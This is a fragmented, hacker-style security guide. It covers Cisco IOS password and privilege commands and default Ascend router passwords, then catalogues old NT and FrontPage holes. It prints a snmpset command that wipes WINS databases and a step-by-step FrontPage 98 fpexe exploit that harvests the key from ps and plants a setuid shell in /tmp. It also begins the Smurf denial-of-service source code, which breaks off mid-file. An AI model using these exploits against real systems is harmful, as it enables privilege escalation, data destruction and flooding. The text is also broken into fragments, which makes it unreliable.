        <w:t xml:space="preserve">Number of the access list of the last packet transmitted from the source to the destination that failed an access lis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lear ip accounting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accounting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accounting-list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accounting-threshold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accounting-transits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7.8] Terminal Access Security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hapter describes the commands used to control access to the rou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log on to the router at a specified level, use the enable EXEC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evel </w:t>
        <w:tab/>
        <w:t xml:space="preserve">(Optional) Defines the privilege level that a user logs in to on the route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evel 15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e enable command is associated with privilege level 0. If you configure AAA authorization for a privilege level greater than 0, this command will not be included in the privilege level command s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the user is logging on to privilege level 5 on a rou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 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rivilege level (globa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rivilege level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7.9] enable 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enable password global configuration command to set a local password to control access to various privilege levels. Use the no form of this command to remove the password requireme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password [level level] {password | encryption-type encrypted-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enable password [level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evel level </w:t>
        <w:tab/>
        <w:t xml:space="preserve">(Optional) Level for which the password applies. You can specify up to 16 privilege levels, using numbers 0 through 15. Level 1 is normal EXEC-mode user privileges. If this argument is not specified in the command or the no form of the command, the privilege level defaults to 15 (traditional enable privilege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assword </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Password users type to enter enable mod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cryption-type </w:t>
        <w:tab/>
        <w:t xml:space="preserve">(Optional) Cisco-proprietary algorithm used to encrypt the password. Currently the only encryption type available is 7. If you specify encryption-type, the next argument you supply must be an encrypted password (a password already encrypted by a Cisco route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crypted-password </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Encrypted password you enter, copied from another router configur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password is defined. The default is level 15.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is command with the level option to define a password for a specific privilege level. After you specify the level and the password, give the password to the users who need to access this level. Use the privilege level (global) configuration command to specify commands accessible at various level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will not ordinarily enter an encryption type. Typically you enter an encryption type only if you copy and paste into this command a password that has already been encrypted by a Cisco rou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ution If you specify an encryption type and then enter a cleartext password, you will not be able to reenter enable mode. You cannot recover a lost password that has been encrypted by any metho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the service password-encryption command is set, the encrypted form of the password you create with the enable password command is displayed when a show startup-config command is enter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can enable or disable password encryption with the service password-encryption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n enable password is defined as follow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Must contain from 1 to 25 uppercase and lowercase alphanumeric characte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Must not have a number as the first charac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Can have leading spaces, but they are ignored. However, intermediate and trailing spaces are recogniz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Can contain the question mark (?) character if you precede the question mark with the key combination Crtl-V when you create the password; for example, to create the password abc?123, do the follow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Enter ab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Type Crtl-V.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Enter ?12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the system prompts you to enter the enable password, you need not precede the question mark with the Ctrl-V; you can simply enter abc?123 at the password promp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the password pswd2 is enabled for privilege level 2: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 password level 2 pswd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the encrypted password $1$i5Rkls3LoyxzS8t9, which has been copied from a router configuration file, is set for privilege level 2 using encryption type 7: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 password level 2 7 $1$i5Rkls3LoyxzS8t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isabl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secr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rivilege level (globa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ervice password-encryp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how privileg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how startup-config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8.0] enable secr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e enable secret global configuration command to specify an additional layer of security over the enable password command. Use the no form of the command to turn off the enable secret func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secret [level level] {password | encryption-type encrypted-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enable secret [level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evel level </w:t>
        <w:tab/>
        <w:t xml:space="preserve">(Optional) Level for which the password applies. You can specify up to sixteen privilege levels, using numbers 0 through 15. Level 1 is normal EXEC-mode user privileges. If this argument is not specified in the command or in the no form of the command, the privilege level defaults to 15 (traditional enable privileges). The same holds true for the no form of the comman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assword </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Password users type to enter enable mode. This password should be different from the password created with the enable password comman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cryption-type </w:t>
        <w:tab/>
        <w:t xml:space="preserve">(Optional) Cisco-proprietary algorithm used to encrypt the password. Currently the only encryption type available for this command is 5 . If you specify encryption-type, the next argument you supply must be an encrypted password (a password encrypted by a Cisco route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crypted-password </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Encrypted password you enter, copied from another router configurat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password is defined. The default level is 15.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 this command in conjunction with the enable password command to provide an additional layer of security over the enable password. The enable secret command provides better security by storing the enable secret password using a non-reversible cryptographic function. The added layer of security encryption provides is useful in environments where the password crosses the network or is stored on a TFTP serv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will not ordinarily enter an encryption type. Typically you enter an encryption type only if you paste into this command an encrypted password that you copied from a router configuration fi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ution If you specify an encryption-type and then enter a cleartext password, you will not be able to reenter enable mode. You cannot recover a lost password that has been encrypted by any metho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you use the same password for the enable password and enable secret commands, you receive an error message warning that this practice is not recommended, but the password will be accepted. By using the same password, however, you undermine the additional security the enable secret command provid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After you set a password using enable secret command, a password set using the enable password command works only if the enable secret is disabled or an older version of Cisco IOS software is being used, such as when running an older rxboot image. Additionally, you cannot recover a lost password that has been encrypted by any metho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service password-encryption is set, the encrypted form of the password you create here is displayed when a show startup-config command is enter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can enable or disable password encryption with the service password-encryption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n enable password is defined as follow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Must contain from 1 to 25 uppercase and lowercase alphanumeric characte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Must not have a number as the first charac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Can have leading spaces, but they are ignored. However, intermediate and trailing spaces are recogniz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Can contain the question mark (?) character if you precede the question mark with the key combination Crtl-V when you create the password; for example, to create the password abc?123, do the follow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Enter ab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Type Crtl-V.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Enter ?12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the system prompts you to enter the enable password, you need not precede the question mark with the Ctrl-V; you can simply enter abc?123 at the password promp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the enable secret password of gobbledegoo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 secret gobbledegoo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fter specifying an enable secret password, users must enter this password to gain access. Any passwords set through enable password will no longer wor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ssword: gobbledego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the encrypted password $1$FaD0$Xyti5Rkls3LoyxzS8 , which has been copied from a router configuration file, is enabled for privilege level 2 using encryption type 5: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 password level 2 5 $1$FaD0$Xyti5Rkls3LoyxzS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8.1] ip ident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identification support, use the ip identd global configuration command. Use the no form of this command to disable this featu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p ident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ip ident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dentification support is not en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ip identd command returns accurate information about the host TCP port; however, no attempt is made to protect against unauthorized queri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 the following example, identification support is enabl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 ident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8.2] login authentic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able TACACS+ authentication for logins, use the login authentication line configuration command. Use the no form of this command to either disable TACACS+ authentication for logins or to return to the defaul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gin authentication {default | list-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login authentication {default | list-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fault </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Uses the default list created with the aaa authentication login comman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st-name </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Uses the indicated list created with the aaa authentication login comman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s the default set with aaa authentication logi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ne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is a per-line command used with AAA that specifies the name of a list of TACACS+ authentication methods to try at login. If no list is specified, the default list is used (whether or not it is specified in the command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ution If you use a list-name value that was not configured with the aaa authentication login command, you will disable login on this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tering the no version of login authentication has the same effect as entering the command with the default argume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Before issuing this command, create a list of authentication processes by using the global configuration aaa authentication login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that the default AAA authentication is to be used on line 4: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ine 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gin authentication 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specifies that the AAA authentication list called list1 is to be used on line 7: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ine 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gin authentication list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aa authentication logi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8.3] privilege level (globa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set the privilege level for a command, use the privilege level global configuration command. Use the no form of this command to revert to default privileges for a given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rivilege mode level level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privilege mode level level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ode </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Configuration mode. (See the alias command in the Configuration Fundamentals Command Reference for a description of mod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evel </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Privilege level associated with the specified command. You can specify up to sixteen privilege levels, using numbers 0 through 15.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ommand </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Command to which privilege level is associat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evel 15 is the level of access permitted by the enable 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evel 1 is normal EXEC-mode user privileg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ommand Mo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description of the alias command, in the Configuration Fundametals Command Reference, shows the options for the mode argument in the privilege level global configuration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password for a privilege level defined using the privilege level global configuration command is configured using the enable password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evel 0 can be used to specify a more-limited subset of commands for specific users or lines. For example, you can allow user "guest" to use only the show users and exit comma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here are five commands associated with privilege level 0: disable, enable, exit, help, and logout. If you configure AAA authorization for a privilege level greater than 0, these five commands will not be includ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you set a command to a privilege level, all commands whose syntax is a subset of that command are also set to that level. For example, if you set the show ip route command to level 15, the show commands and show ip commands are automatically set to privilege level 15---unless you set them individually to different level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commands in the following example set the configure command to privilege level 14 and establish SecretPswd14 as the password users must enter to use level 14 comma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ivilege exec level 14 config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 secret level 14 SecretPswd1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secr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rivilege level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8.4] privilege level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set the default privilege level for a line, use the privilege level line configuration command. Use the no form of this command to restore the default user privilege level to the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rivilege level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privilege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evel </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Privilege level associated with the specified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evel 15 is the level of access permitted by the enable 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evel 1 is normal EXEC-mode user privileg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ommand Mo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ne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s can override the privilege level you set using this command by logging in to the line and enabling a different privilege level. They can lower the privilege level by using the disable command. If users know the password to a higher privilege level, they can use that password to enable the higher privilege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can use level 0 to specify a subset of commands for specific users or lines. For example, you can allow user "guest" to use only the show users and exit comman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might specify a high level of privilege for your console line to restrict who uses the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commands in the following example configure the auxiliary line for privilege level 5. Anyone using the auxiliary line has privilege level 5 by defaul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ine aux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ivilege level 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command in the following example sets all show ip commands, which includes all show commands, to privilege level 7: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ivilege exec level 7 show ip rou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is equivalent to the following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ivilege exec level 7 sh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commands in the following example set show ip route to level 7 and the show and show ip commands to level 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ivilege exec level 7 show ip rou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rivilege exec level 1 show i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rivilege level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8.5] service password-encryp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ncrypt passwords, use the service password-encryption global configuration command. Use the no form of this command to disable this servi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ervice password-encryp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service password-encryp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 encryp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actual encryption process occurs when the current configuration is written or when a password is configured. Password encryption is applied to all passwords, including authentication key passwords, the privileged command password, console and virtual terminal line access passwords, and BGP neighbor passwords. This command is primarily useful for keeping unauthorized individuals from viewing your password in your configuration fi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password encryption is enabled, the encrypted form of the passwords is displayed when a show startup-config command is entered. Caution This command does not provide a high level of network security. If you use this command, you should also take additional network security measur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You cannot recover a lost encrypted password. You must clear NVRAM and set a new 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auses password encryption to take pla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ice password-encry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ey-string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eighbor password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8.6] show privileg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display your current level of privilege, use the show privilege EXEC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how privileg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has no arguments or keywor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ommand Mo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EC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first appeared in Cisco IOS Release 10.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ample Displ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is sample output from the show privilege command. The current privilege level is 15.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uter# show privile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urrent privilege level is 1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password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able secret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2.8.7] user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establish a username-based authentication system, enter the username global configuration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nopassword | password password [encryption-type encrypted-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password secr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access-class numb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autocommand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callback-dialstring telephone-numb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callback-rotary rotary-group-numb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callback-line [tty] line-number [ending-line-numb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nocallback-verif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noescape] [nohangu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privilege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ame </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Host name, server name, user ID, or command name. The name argument can be only one word. White spaces and quotation marks are not allow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password </w:t>
        <w:tab/>
        <w:t xml:space="preserve">No password is required for this user to log in. This is usually most useful in combination with the autocommand keywor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assword </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Specifies a possibly encrypted password for this usernam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assword </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Password a user enter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cryption-type </w:t>
        <w:tab/>
        <w:t xml:space="preserve">(Optional) Single-digit number that defines whether the text immediately following is encrypted, and, if so, what type of encryption is used. Currently defined encryption types are 0, which means that the text immediately following is not encrypted, and 7, which means that the text is encrypted using a Cisco-defined encryption algorithm.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crypted password </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Encrypted password a user enter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assword </w:t>
        <w:tab/>
        <w:t xml:space="preserve">(Optional) Password to access the name argument. A password must be from 1 to 25 characters, can contain embedded spaces, and must be the last option specified in the username comman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ecret </w:t>
        <w:tab/>
        <w:t xml:space="preserve">For CHAP authentication: specifies the secret for the local router or the remote device. The secret is encrypted when it is stored on the local router. The secret can consist of any string of up to 11 ASCII characters. There is no limit to the number of username and password combinations that can be specified, allowing any number of remote devices to be authenticat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ccess-class </w:t>
        <w:tab/>
        <w:t xml:space="preserve">(Optional) Specifies an outgoing access list that overrides the access list specified in the access-class line configuration command. It is used for the duration of the user's session.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umber </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Access list numbe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utocommand </w:t>
        <w:tab/>
        <w:t xml:space="preserve">(Optional) Causes the specified command to be issued automatically after the user logs in. When the command is complete, the session is terminated. Because the command can be any length and contain embedded spaces, commands using the autocommand keyword must be the last option on the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ommand </w:t>
        <w:tab/>
        <w:t xml:space="preserve">The command string. Because the command can be any length and contain embedded spaces, commands using the autocommand keyword must be the last option on the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llback-dialstring </w:t>
        <w:tab/>
        <w:t xml:space="preserve">(Optional) For asynchronous callback only: permits you to specify a telephone number to pass to the DCE devic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elephone-number </w:t>
        <w:tab/>
        <w:t xml:space="preserve">For asynchronous callback only: telephone number to pass to the DCE devic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llback-rotary </w:t>
        <w:tab/>
        <w:t xml:space="preserve">(Optional) For asynchronous callback only: permits you to specify a rotary group number. The next available line in the rotary group is select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otary-group-number </w:t>
        <w:tab/>
        <w:t xml:space="preserve">For asynchronous callback only: integer between 1 and 100 that identifies the group of lines on which you want to enable a specific username for callback.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llback-line </w:t>
        <w:tab/>
        <w:t xml:space="preserve">(Optional) For asynchronous callback only: specific line on which you enable a specific username for callback.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ty </w:t>
        <w:tab/>
        <w:t xml:space="preserve">(Optional) For asynchronous callback only: standard asynchronous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ine-number </w:t>
        <w:tab/>
        <w:t xml:space="preserve">For asynchronous callback only: relative number of the terminal line (or the first line in a contiguous group) on which you want to enable a specific username for callback. Numbering begins with zero.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nding-line-number </w:t>
        <w:tab/>
        <w:t xml:space="preserve">(Optional) Relative number of the last line in a contiguous group on which you want to enable a specific username for callback. If you omit the keyword (such as tty), then line-number and ending-line-number are absolute rather than relative line numbers.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callback-verify </w:t>
        <w:tab/>
        <w:t xml:space="preserve">(Optional) Authentication not required for EXEC callback on the specified line.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escape </w:t>
        <w:tab/>
        <w:t xml:space="preserve">(Optional) Prevents a user from using an escape character on the host to which that user is connected.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hangup </w:t>
        <w:tab/>
        <w:t xml:space="preserve">(Optional) Prevents the security server from disconnecting the user after an automatic command (set up with the autocommand keyword) has completed. Instead, the user gets another login prompt.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rivilege </w:t>
        <w:tab/>
        <w:t xml:space="preserve">(Optional) Sets the privilege level for the use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evel </w:t>
        <w:tab/>
        <w:t xml:space="preserve">(Optional) Number between 0 and 15 that specifies the privilege level for the user. </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aul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and M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lobal configur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age Guide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commands first appeared in Cisco IOS Release 10.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nopassword | password password [encryption-type encrypted-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password secr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access-class numb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autocommand comman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noescape] [nohangu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privilege leve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commands first appeared in Cisco IOS Release 1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callback-dialstring telephone-numb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callback-rotary rotary-group-numb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callback-line [tty] line-number [ending-line-numb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username name [nocallback-verif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username command provides username and/or password authentication for login purposes only. (Note that it does not provide username and/or password authentication for enable mode when the enable use-tacacs command is also configur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ultiple username commands can be used to specify options for a single us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dd a username entry for each remote system that the local router communicates with and requires authentication from. The remote device must have a username entry for the local router. This entry must have the same password as the local router's entry for that remote devi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command can be useful for defining usernames that get special treatment. For example, you can use this command to define an "info" username that does not require a password, but connects the user to a general purpose information servi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username command is required as part of the configuration for the Challenge Handshake Authentication Protocol (CHAP). Add a username entry or each remote system the local router requires authentication fro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e To enable the local router to respond to remote CHAP challenges, one username name entry must be the same as the hostname name entry that has already been assigned to your rout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there is no secret specified and the debug serial-interface command is enabled, an error is displayed when a link is established and the CHAP challenge is not implemented. CHAP debugging information is available using the debug serial-interface and debug serial-packet commands. For more information about debug commands, refer to the Debug Command Referen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implement a service similar to the UNIX who command, which can be entered at the login prompt and lists the current users of the router, the username command takes the following for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name who nopassword nohangup autocommand show us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implement an information service that does not require a password to be used, the command takes the following for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name info nopassword noescape autocommand telnet nic.ddn.m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o implement an ID that works even if the TACACS servers all break, the command takes the following for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name superuser password super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ollowing example configuration enables CHAP on interface serial 0. It also defines a password for the local server, Adam, and a remote server, E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ostname Ad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face serial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capsulation pp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authentication cha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name Adam password our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name Eve password their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en you look at your configuration file, the passwords will be encrypted and the display will look similar to the follow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ostname Ad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face serial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capsulation pp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pp authentication cha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name Adam password 7 151404035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name Eve password 7 121F0A1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lated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dagger (†) indicates that the command is documented outside this chapter. Two daggers (††) indicate that the command is documented in the Debug Command Referen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rap callback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llback-forced-wait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ebug callback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pp callback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2.8.8] A Word on Ascend Rout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cend routers or ok, but they're not as powerful or as configurable as Cisco. So we will not spend as much time on them. Actually we will not spend any time on them...The only thing we will say is that unless an Administrator changes the password.. the default password on an Ascend is either blank or asce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0] Known NT/95/IE Ho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1] WINS port 8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und by NeonSurge (rhino9 te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s not a critical bug. Its actually more of a nuissance than anything else. If you telnet or stream data to port84 of an NT server, it will cause an error to be recorded in the event long. In some systems, this can cause the hard drive to completely fill up with error messages, causing other applications to fail due to lack of drive space. The flaw will also cause the server to respond extremely sl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the telnet attack, simply telnet to the WINS port on an NT server and type on garbage characters, hit enter and it will cause the event log en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ame effect was achieved by using an application called pepsi to stream UDP informaiton to the same po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2] WindowsNT and SNM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und by Christopher Rouland (from ntsecurity.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ristopher wri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have found two significant "features" in the SNMP agent implementations under NT 4.0 Server, and I am sure there are more if I feel like really digging. The first issue I sent in earlier this year to Microsoft and received no response other than "expected behavior" and the second I just found and puts any large NT shop at a serious denial of service (DOS) ris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This first exploit demonstrates the ability via SNMP to dump a list of all usernames in an NT domain (assuming the target box is a DC) or on an NT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re is the simplest NT example I could find to use th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NTRESKIT&gt;snmputil walk public .1.3.6.1.4.1.77.1.2.2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ould be a domain controller or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The second exploit demonstrates the ability via SNMP to delete all of the records in a WINS database remotely, bypassing all NT security. If you understand large scale WINS architecture, you can understand the implications of this. Knowledge of SNMP community strings would allow an attacker to effectively shut down any large NT infrastructure with "N" commands (N=number of WINS servers). This is permitted due to the extensive "cmd" set implemented in the WINS extension agent, specifical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 cmdDeleteWins OBJECT-TYP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TAX IpAdd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CCESS read-wri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US manda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variable when set will cause all information pertaining to a WINS (data records, context information to be deleted from the local WINS. Use this only when owner-address mapping tables getting to near capacity. NOTE: deletion of all information pertaining to the managed WINS is not permit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 cmd 3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nce the SNMP toolset implemented under NT will not do snmp-set-requests, my sample exploit was done using the CMU SNMP development kit under Unix. The command "rnjdev02:~/cmu$ snmpset -v 1 192.178.16.2 public .1.3.6.1.4.1.311.1.2.5.3.0 a 192.178.16.2" successfully entirely deleted my WINS databa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 It appears that there are several other pieces of the LMMIB2 definition that allow for things such as remote session deletion or disconnect, etc, but I have not yet looked into th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 Stopping the Probl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implest fix is to disable SNMP, or to remove the extension agents through the SNMP configuration in the regi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you MUST use SNMP, then at least block inbound access to that port. Be aware that using NT's various SNMP agents, a malicious intruder could gain knowledge about your entire network. In fact, they could quite easily gain everything they need to enter your network, except a password -- and those come in due time. BEW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3] Frontpage98 and Uni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und by Marc Slemko (from netsecurity.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ttack was described most adequated by the discover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ange His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at Oct 11 1997: Initial posting of web p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d Oct 15 1997: Microsoft posted a note responding to the issues raised. I am glad to see that they have plans to release the source of the revised version for review when it is complete. I will update this page with further comments when the fixed version is relea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d Oct 22 1997: Microsoft has released a new version of the extensions that claim to fix the security issues. I will comment further on the security of their proposed fix after I have time to review the changes. Check back here in a few days for my comm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rodu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information below talks about using Microsoft's FrontPage 98 extensions with Apache on Unix with Microsoft's mod_frontpage changes. This do not apply to running it on any other server or to running it on Unix without the Microsoft mod_frontpage changes or to running it on Windows NT. There are, however, other security issues on such servers, some of which are similar to those in the FrontPage 97 extensions. I should also note that the Unix server extensions seem to be written in part or completely by Ready-to-Run Software Inc. (RTR) for Microsoft. I will refer to it as Microsoft's product because it is, no matter who wrote it. This discussion is specific to the FrontPage 98 extensions. For more general information on some security problems in earlier versions, some of which are resolved and some of which aren't, see Scott Fritchie's Why I Don't Like Microsoft's FrontPage Web Authoring Tool web page. Parts of it are no longer entirely relevant, but it provides a good backgrou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is no secret that the security of the FrontPage 97 and earlier Unix server extensions is quite poor, if Microsoft's instructions are followed. Some of their instructions were quite hilarious when first released, like the suggestion of running your web server as root. It is possible to make them more acceptable--acceptable enough for some sites--but it requires careful work by the administra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had appeared like Microsoft had increased the security of the extensions in the FP98 version available from Microsoft's Web Site. However, a closer examination reveals startling flaws. What they have done is make a small setuid root wrapper that the web server calls. This wrapper than setuid()s to the appropriate user and runs the requested FP CGI as that user. The problem lies in the fact that the wrapper ("fpexe") is written very poorly. while making such a wrapper secure can be difficult, the gaping holes in this program show a complete lack of understanding of security in the Unix environ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pexe program is available for you to inspect yourself. It was originally posted in RTR's FrontPage FAQ. This version is not exactly the same as the one currently distributed (at least it is not the same as the one in the BSD/OS 2.1 kit), but it is close. Both appear to exhibit the same failing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en I refer to the FP CGI programs, I am referring to the three files normally referenced under the _vti_bin directory: shtml.exe, admin.exe and author.ex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key in this discussion is the fact that nothing is stopping anyone from trying to run this fpexe wrapper. If they can trick it into running, they can possible gain privileges they should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ow It Wor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fore you can understand the holes in the FP server extensions, you need to understand what I mean when I talk about the "key". When the Frontpage-modified Apache server starts up, it generates a pseudo-random string of 128 ASCII characters as a key. This key is written to a file that is only readable by the user that starts Apache; normally root. The server than passes the key to fpexe. Since fpexe is setuid root, it can compare the key stored on disk with the one it was passed to be sure they match; if not, it refuses to run. This is used in an attempt to guarantee that the only thing calling fpexe is the web server. Used properly this is a powerful part of possible security precautions. I am not convinced that the generation of the key is cryptographically adequate and it may be subject to intelligent guessing attacks, however I have not looked at it to see. As discussed later, the cryptographical robustness of the key doesn't really mat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are a number of problems with the setuid root fpexe program. I am not attempting a complete description of all the problems and their possible consequences and fixes, just making a light sweep over the top. The more obvious problems inclu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turn codes from library calls are not properly checked. An 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 = fopen( buf, "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gets( key, 129, f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close(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fopen() failed (easy to make it do so with ulimit -n), then if your system did not core dump on a fgets() on a closed descriptor you would end up with an empty key. It is obviously easy to guess an empty key. I am not aware of any systems that exhibit this exact problem, but it is possible. Return codes need to be checked, especially in setuid progra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per bounds checking is not done. This leads to obvious buffer overflows. An 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rcpy( work, FPDI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rcat( work, getenv("FPEX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won't go into the details of what this does, but if you could cause this code to be executed, you could insert your own code on most systems and likely gain access to the UID the program is running as (root). This proves to be an unnecessary effort to go to, because this code is only executed if you have the correct key; if you have the correct key, there are far easier ways to gain access. Buffer overflows are one of the most popular (albeit normally boring) types of new holes in programs being publiciz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does not clean the environment variables before starting the CGI. Again, this means you can gain access to the UID that the program runs as (not root). If the rest of the program was securely written, this could possibly be an issue however it is of little consequence currently due to the gaping holes in other area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assumes that if you have the key, then you are authorized to have it run any program as nearly any user you tell it to. The process you are running also needs to be in the same process group as the web server; all CGIs run by the server, however, are in the same process group so if you can run a CGI script you can work around the second check. It does no further checks to be sure you are running as a user that should be allowed to run FrontPage CGIs (other than disallowing UID 0; the compiled version also disallows gid 0, however the source version doesn't) or that you are running a Frontpage related program. This means that if you get the key file, you can gain access to any non-root UID on the server. On 99% of boxes, that will give you root. For example, if binaries are owned by bin then become bin and replace one that is run by root from cron. The possibilities are endless once you obtain this level of ac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d, finally, the worst: it passes the key to fpexe via an environment variable! On most systems, environment variables are available via "ps -e". This means that anyone with access to run programs on the system (and there are often more people than you think that are able to do this, due to things such as CGIs) can see it as it is being passed from the web server to fpexe. Recall that once you have the key, there is little remaining before you can get full access to the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monstr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y now, it should be obvious that there is a serious security problem in the FrontPage 98 server extensions. Here is one demonstration; do not think that this is the only way or that just because you prevent one step of this process from working it is any more difficult to exploit the security ho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rst I have to find the key. This can be done by using ps to get the environment from fpexe. To do this, I first setup a loop running (this assumes a real aka. Bourne shell; if you use the bastard C-shell it obviously won't work as writt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ile true; do ps axuwwe -U nobody | grep FPKEY; d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n I used ZeusBench, a very simple HTTP benchmark program, to generate load on the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zb localhost /fp/_vti_bin/shtml.exe -c 50 -t 3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y method of generating traffic could be used, including a web browser. Since I am using a very inefficient method of looking for a process, I need to generate lots of traffic to increase my chance of finding one. It certainly isn't likely to happen on the first request. The requests do have to be made to a FP CGI script so it will call fpex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fore long, I had what I wanted from ps (manually wrapp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body 28008 0.0 0.2 180 76 ?? DN 6:51PM 0:00.0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CRIPT_URL=/fp/ SCRIPT_URI=http://localhost/fp/ FPUID=1000 FPGID=1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PEXE=/_vti_bin/shtml.exe FPKEY=9AF675E332F7583776C241A4795FE387D8E5DC80E7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FAB70794848FDEFB173FF14CDCDC44F3FAAF144A8C95A81C04BF5FC2B9EFDE3C8DCA1049C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760364E59 HTTP_USER_AGENT=ZeusBench/1.0 HTTP_ACCEP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TH=/sbin:/usr/sbin:/bin:/usr/local/bin:/usr/bin:/usr/local/sb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RVER_SOFTWARE=Apache/1.2.5-dev SERVER_NAME=localhost SERVER_PORT=8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MOTE_HOST=localhost REMOTE_ADDR=127.0.0.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CUMENT_ROOT=/usr/local/etc/httpd/htdocs SERVER_ADMIN=marcs@znep.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CRIPT_FILENAME=/usr/local/frontpage/currentversion/apache-fp/_vti_bin/fpex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MOTE_PORT=2849 GATEWAY_INTERFACE=CGI/1.1 SERVER_PROTOCOL=HTTP/1.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QUEST_METHOD=GET QUERY_STRING= REQUEST_URI=/fp/_vti_bin/shtml.ex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CRIPT_NAME=/fp/_vti_bin/shtml.exe fpex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n I need to use the key to make fpexe think I am the web server. I can't just run this from a normal shell, since I need to be in the same process group as the web server. A simple CGI suff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in/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cho Content-type: text/pl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ch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port FPUID=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port FPGID=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port FPEXE=../../../../../../../../tmp/gotch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port FPKEY=9AF675E332F7583776C241A4795FE387D8E5DC80E773FAB70794848FDEFB17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F14CDCDC44F3FAAF144A8C95A81C04BF5FC2B9EFDE3C8DCA1049CDF760364E5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r/local/frontpage/currentversion/apache-fp/_vti_bin/fpexe 2&gt;&amp;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need a program for it to run (/tmp/gotcha in this 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in/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r/bin/i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p /bin/sh /tmp/.my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mod u+s /tmp/.my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n I simply make a HTTP request for the CGI script. I can then run /tmp/.mysh at my leisure to gain access to UID 3 (bin on my system) and do what I want from the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opping the Probl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ad the new extensions from here. So now you want to fix it. Well. That's the hard part. The only real solution is for someone (either Microsoft or a third party) to do some work to improve the security. It is possible to do this securely. Microsoft hasn't. They have no excuse. This page will be updated when (if?) better fixes become avail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pache web server has a suEXEC wrapper designed to allow for a similar thing; that is, execution of CGI scripts under a user's own UID. It is very restrictive (some would say anal) about what it allows: there is a reason for that, as Microsoft's obviously failed attempt at security shows. It is possible that suEXEC could be adapted to function in conjunction with FrontPage, however it will not work without source modific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e short term workaround until Microsoft addresses the issue is to simply remove the FrontPage setup from your system. This can be done temporarily by removing the setuid bit from fpexe (ie. chmod u-s fpexe). This will prevent all the pretty FrontPage CGIs from working. It will prevent people from uploading new pages using FrontPage's own methods (ie. they can tell FrontPage to use FTP and they will still be uploaded), but generic content that doesn't rely on FrontPage's server side CGI scripts should work f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other possible workaround is to prevent users from running the ps command. This could have a very negative impact on your system if things depend on it, and is a poor solution however it may be the best one for you. On systems that don't use a procfs (/proc) based ps, you can normally simply remove world execute permissions from it to disable it. If you are on a system like Linux that normally uses a procfs for ps to get information, this doesn't solve the problem because someone can read from the procfs direct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ast of all, since this problem only occurs when using FrontPage with the mod_frontpage extensions, it is possible to use the FrontPage extensions on Apache without using mod_frontpage or fpexe. Unfortunately, this conversion is not easy. It means that, after recompiling Apache without any of the Microsoft modifications (just commenting out mod_frontpage from the Configuration file may be enough; haven't checked) you have to either manually copy the FrontPage CGIs to the appropriate subdirectory under each user's web directory and make them setuid to that user or copy them (or make links) and don't make them setuid to that user. The former preserves the current ownership. With the latter all the user's web files will need to be changed back to being owned by the user the web server runs as or else they will be unable to manipulate them and some of the FP CGIs won't run correctly. This is a pain and brings you back to the horrible security practice of letting anyone who can run CGIs modify any FrontPage user's files. Although this may be the best temporary workaround (although quite annoying if you have a large number of users), I can not go into step by step details of how to accomplish this change because I am not fully familiar with various ways of using the FrontPage extensions. The Microsoft FP security considerations document (part of the FP98 Server Extensions Resource Kit) provides some more details of the method in which the CGIs are run without fpex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sort of continued disregard for security is unacceptable and inexcusable. It does not take significant knowledge to know that some of the things being done are flawed. If internal expertise is not available, an external consultant should be hired for a security review of any critical code such as fpexe. This is not rocket science nor is it particularily advanced programming. Nothing that I have described above is complicated or new. Code reviews are common practice in many companies and serve good purpo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ce Microsoft fixes their glaring holes, assuming they do, I would suggest you should consider if you want to run their FrontPage extensions at all. Even though, once fpexe is properly fixed, you only risk the accounts of users using FrontPage (since that is who the FrontPage CGI scripts run as), that can be a significant risk. It is very possible that when someone gets bored they will find a hole in the FrontPage CGI scripts that gives them user level access to your system. And Microsoft doesn't (and isn't likely to in the future, if their past is any indication) give the source to those. Microsoft's own source speaks better for itself than anyone else ever coul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have this nagging feeling that this will result in Microsoft coming out with a "fixed" version and not releasing the source to it at all. After all, it was only after the source came out that these flaws became a problem. Right? Wrong. This was a gaping hole waiting to be discovered. It would have almost certainly been discovered sooner or later regardless of source availability; better sooner than later. I certainly hope that Microsoft doesn't think the lesson in this is that source should not be released. It is insecure with or without the source. The FrontPage server extensions aren't going to find their way anywhere near any machines I control any time soon because I have no trust in the company behind th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 a side note, Microsoft actually modifies the server name returned to clients when the FrontPage patches are installed in Apache to include "FrontPage/x.x.x". That is fine, however it gives anyone connecting to your server the ability to determine the chances of them being able to break into your system using holes in the FP server extens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4] TCP/IP Flooding with Smur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und by TFreak (from ntsecurity.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robl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murf attack is quite simple. It has a list of broadcast addresses which it stores into an array, and sends a spoofed ICMP echo request to each of those addresses in series and starts again. The result is a devistating attack upon the spoofed IP. Depending on the amount of broadcast addresses used, many, many computers may respond to the echo requ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attack can EASILY saturate a T1 circuit, rendering it completely usel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RE IS THE SMURF SOURCE C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Id smurf.c,v 4.0 1997/10/11 13:02:42 EST tfreak Ex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poofs icmp packets from a host to various broadcast addresses resul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in multiple replies to that host from a single pack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disclaim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I cannot and will not be held responsible nor legally bound for t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malicious activities of individuals who come into possession of th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program and I refuse to provide help or support of any kind and do NO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ondone use of this program to deny service to anyone or any mach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his is for educational use only. Please Don't abuse th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Frea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signal.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stdio.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stdlib.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sys/socket.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sys/types.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netinet/in.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netinet/ip.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netinet/ip_icmp.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netdb.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ctype.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arpa/inet.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unistd.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string.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oid banner(voi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oid usage(cha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oid smurf(int, struct sockaddr_in, u_long, i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oid ctrlc(i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signed short in_chksum(u_short *, i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tam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ar id[] = "$Id smurf.c,v 4.0 1997/10/11 13:02:42 EST tfreak Ex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 main (int argc, char *argv[])</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ruct sockaddr_in s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ruct hostent *h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LE *bcast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 i, sock, bcast, delay, num, pktsize, cycle = 0, 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ar buf[32], **bcastaddr = malloc(819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ann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gnal(SIGINT, ctrl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argc &lt; 6) usage(argv[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he = gethostbyname(argv[1])) == NUL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error("resolving source ho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it(-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mcpy((caddr_t)&amp;sin.sin_addr, he-&gt;h_addr, he-&gt;h_leng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n.sin_family = AF_I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n.sin_port = htons(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um 